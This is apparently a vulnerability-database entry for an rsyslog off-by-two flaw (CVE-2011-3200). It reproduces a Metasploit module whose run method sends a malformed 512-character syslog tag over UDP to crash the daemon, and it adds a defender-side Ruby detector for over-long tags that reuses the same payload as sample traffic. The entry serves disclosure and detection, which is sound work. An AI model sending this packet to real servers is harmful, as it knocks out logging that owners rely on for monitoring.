metasploit | Hdm <[email protected]> | MSF:AUXILIARY-DOS-SYSLOG-RSYSLOG_LONG_TAG-
Sep 02, 2011 - 3:55 p.m.

rsyslog Long Tag Off-By-Two DoS

2011-09-02 15:55:54
www.rapid7.com

CVSS2: 5

Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

This module triggers an off-by-two overflow in the rsyslog daemon. This flaw is unlikely to yield code execution but is effective at shutting down a remote log daemon. This bug was introduced in version 4.6.0 and corrected in 4.6.8/5.8.5. Compiler differences may prevent this bug from causing any noticeable result on many systems (RHEL6 is affected).

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos

  def initialize
    super(
      'Name'        => 'rsyslog Long Tag Off-By-Two DoS',
      'Description' => %q{
          This module triggers an off-by-two overflow in the
        rsyslog daemon. This flaw is unlikely to yield code execution
        but is effective at shutting down a remote log daemon. This bug
        was introduced in version 4.6.0 and corrected in 4.6.8/5.8.5.
        Compiler differences may prevent this bug from causing any
        noticeable result on many systems (RHEL6 is affected).
      },
      'Author'      => 'hdm',
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2011-3200'],
          [ 'URL', 'https://www.rsyslog.com/potential-dos-with-malformed-tag/' ],
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=727644' ],
        ],
      'DisclosureDate' => 'Sep 01 2011')

    register_options(
      [
        Opt::RPORT(514)
      ])
  end

  def run
    connect_udp
    pkt = "<174>" + ("#" * 512) + ":"
    print_status("Sending message containing a malformed RFC3164 tag to #{rhost}")
    udp_sock.put(pkt)
    disconnect_udp
  end
end
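
A defender-side check for the datagram shape this module sends, as an added example that is not part of the Metasploit module or of rsyslog: it parses RFC 3164 messages and flags any whose tag exceeds the RFC's 32-character limit. The function names, the sample datagrams and the documentation-range addresses are constructed for illustration, and treating the first space, colon or bracket as the end of the tag is an assumption of this example.

```ruby
# Added example: flag syslog datagrams whose RFC 3164 TAG is over-long.
# RFC 3164 limits the TAG to 32 alphanumeric characters.
RFC3164_MAX_TAG = 32
MONTHS = 'Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec'
# Optional "Mmm dd hh:mm:ss host " header; many senders omit it.
HEADER = /\A(?:#{MONTHS}) [ \d]\d \d\d:\d\d:\d\d \S+ /

# Parse one datagram. Returns { pri:, tag_len:, verdict: } where verdict
# is :ok, :long_tag or :no_pri.
def inspect_datagram(data)
  data = data.b # raw bytes: payloads need not be valid UTF-8
  m = /\A<(\d{1,3})>/.match(data)
  return { pri: nil, tag_len: 0, verdict: :no_pri } unless m

  rest = m.post_match
  h = HEADER.match(rest)
  rest = h.post_match if h
  # Assumption: the tag ends at the first space, colon or '['.
  tag_len = rest[/\A[^\s:\[]*/].length
  verdict = tag_len > RFC3164_MAX_TAG ? :long_tag : :ok
  { pri: m[1].to_i, tag_len: tag_len, verdict: verdict }
end

# Given [source_ip, payload] pairs, return { source_ip => longest tag seen }
# for sources that sent at least one over-long tag.
def flagged_sources(datagrams)
  datagrams.each_with_object({}) do |(src, payload), hits|
    r = inspect_datagram(payload)
    next unless r[:verdict] == :long_tag
    hits[src] = [hits.fetch(src, 0), r[:tag_len]].max
  end
end

# Constructed sample traffic (documentation address ranges).
SAMPLES = [
  ['192.0.2.10', '<13>Sep  2 15:55:54 host1 sshd[4242]: Accepted publickey for alice'],
  ['192.0.2.11', '<30>cron: job finished'],
  ['198.51.100.7', '<174>' + ('#' * 512) + ':'],
  ['198.51.100.7', "<174>\xff\xfe binary junk"]
].freeze

if __FILE__ == $PROGRAM_NAME
  flagged_sources(SAMPLES).each do |src, len|
    puts "ALERT src=#{src} tag_len=#{len} limit=#{RFC3164_MAX_TAG}"
  end
end
```

Syslog over UDP is unauthenticated, so the source address in an alert can be spoofed. The remedy the description names is running a corrected release (4.6.8 or 5.8.5).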
